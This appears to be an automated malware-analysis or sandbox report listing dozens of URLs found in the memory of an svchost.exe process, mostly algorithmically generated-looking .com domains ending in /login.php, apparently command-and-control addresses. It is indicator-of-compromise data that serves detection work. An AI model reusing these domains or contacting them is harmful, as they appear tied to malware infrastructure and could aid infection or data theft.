Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844445717.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845203467.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybeg.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybuv.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybuv.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/0;
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/H
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1901770860.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygog.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygog.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840385110.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839709376.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygyq.com/login.php
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjop.com/
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyliv.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymaq.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvypoq.com/
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytuq.com/H
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytuq.com/http://puvytuq.com/H
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1882273113.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvywup.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyxig.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyxig.com/login.phpg
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydal.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydal.com/login.phpc
Source: svchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947234961.0000000002F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydog.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyduq.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyduq.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygop.com/login.php
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyguv.com/
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832918592.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1818447804.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822071432.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816434149.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816435063.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyguv.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjyg.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylyp.com/H
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylyq.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymev.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypav.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906280204.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypav.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxip.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyfup.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhag.com/
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykap.com/http://lyvyjox.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykul.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylov.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AD8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyniv.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyniv.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqeq.com/login.php
Source: svchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936268348.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqig.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929613840.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrel.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrip.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebysaq.com/login.php
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873699539.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868461374.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1866818610.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864780566.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebysul.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyvyl.com/
Source: svchost.exe, 00000002.00000003.1901770860.0000000008AE3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyvyl.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937315639.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920519032.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1933122469.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyxog.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyxog.com/login.php3
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1922202257.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyfyv.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedykep.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedykep.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedylig.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedylig.com/X
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedynug.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyqal.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyqal.com/login.php
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1863832827.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1867527067.0000000008ABD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873430860.0000000008ABD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyqup.com/login.php
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedysov.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1915969207.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedytoq.com/login.php
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796369043.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyveg.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyxel.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832918592.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1831046743.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1818447804.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822071432.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816434149.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816435063.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyxip.com/login.php
Source: svchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929613840.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947537528.0000000008ABD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1946620644.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyfeq.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyfil.com/
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyfil.com/login.php
Source: svchost.exe, 00000002.00000003.1943881239.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1341813350.0000000002F65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744793838.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1960801162.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1351824984.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1361292804.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1961031617.0000000008BBF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1944468458.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1961288192.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1341912346.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1346492801.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1344512429.0000000002FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyhig.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920519032.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyhip.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegykeg.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegylul.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegylul.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920519032.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyqov.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegysyg.com/login.php
